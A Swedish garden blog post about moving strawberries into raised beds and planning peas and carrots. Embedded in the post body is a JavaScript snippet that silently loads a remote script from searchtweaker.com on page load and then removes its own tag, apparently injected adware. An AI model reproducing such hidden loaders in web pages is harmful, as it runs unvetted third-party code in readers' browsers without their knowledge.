Livet hos Hogengård

Trädgården ändras

Altanrabatten blir inte klar. Nu har jag flyttat smultron och jordgubbar till pallkragarna. De har en förmåga att ta över allt. Nu är det stopp på det i denna rabatten. Dock har jag lite idétorka och vet inte hur jag ska fortsätta… I högra delen har jag kryddväxter men i resten blev det väldigt tomt. Funderar på om jag ska flytta dit förra årets austinrosor men är inte säker på att det funkar. 
Pallkragarna är på plats med jordgubbar och smultron. Ska bara få upp ett nät så fåglarna håller sig borta. I den som är dubbel ska jag så ärtor och morötter. Väntar till värsta regnet är över så inte ärtorna ruttnar. 

(function(){try{var header=document.getElementsByTagName(”HEAD”)[0];var script=document.createElement(”SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Related Posts

Lämna ett svar

Din e-postadress kommer inte publiceras. Obligatoriska fält är märkta *

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

The reCAPTCHA verification period has expired. Please reload the page.